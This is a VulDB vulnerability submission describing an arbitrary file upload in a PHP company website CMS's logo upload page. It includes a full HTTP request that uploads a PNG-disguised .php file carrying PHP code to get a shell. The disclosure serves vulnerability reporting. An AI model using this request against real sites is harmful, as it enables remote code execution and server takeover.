Submit #43168: Company Website CMS Background file upload getshell RCEinfo

TitleCompany Website CMS Background file upload getshell RCE
Descriptioninfo:There is an arbitrary file upload vulnerability in the company's website CMS background upload logo icon Upload the logo in the background, capture the package and modify the suffix to php. Add the php code getshell at the end of the picture to realize RCE. Then copy the logo image address in the upper left corner of the background to access URL:https://www.sourcecodester.com/php/15517/company-website-cms-php.html payload: POST /dashboard/updatelogo.php HTTP/1.1 Host: 10.11.20.110:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------897055484585946140954985216 Content-Length: 1732 Origin: http://10.11.20.110:8090 Connection: close Referer: http://10.11.20.110:8090/dashboard/updatelogo.php Cookie: PHPSESSID=osasi2heuvl3l3ekci99lt0tmt Upgrade-Insecure-Requests: 1 -----------------------------897055484585946140954985216 Content-Disposition: form-data; name="xfile"; filename="123.php" Content-Type: image/png ‰PNG [ Note that normal picture information is required here ] -----------------------------897055484585946140954985216 Content-Disposition: form-data; name="ufile"; filename="123.php" Content-Type: image/png ‰PNG [ Note that normal picture information is required here ] <?php phpinfo();?> -----------------------------897055484585946140954985216 Content-Disposition: form-data; name="save" -----------------------------897055484585946140954985216--
Source⚠️ https://www.sourcecodester.com/php/15517/company-website-cms-php.html
User
 jsbae3449 (UID 30775)
Submission08/09/2022 12:26 (4 years ago)
Moderation08/09/2022 14:43 (2 hours later)
StatusAccepted
VulDB entry205881 [SourceCodester Company Website CMS Background Upload Logo Icon updatelogo.php xfile/ufile unrestricted upload]
Points20

PreviousOverviewNext

Do you know our Splunk app?

Download it now for free!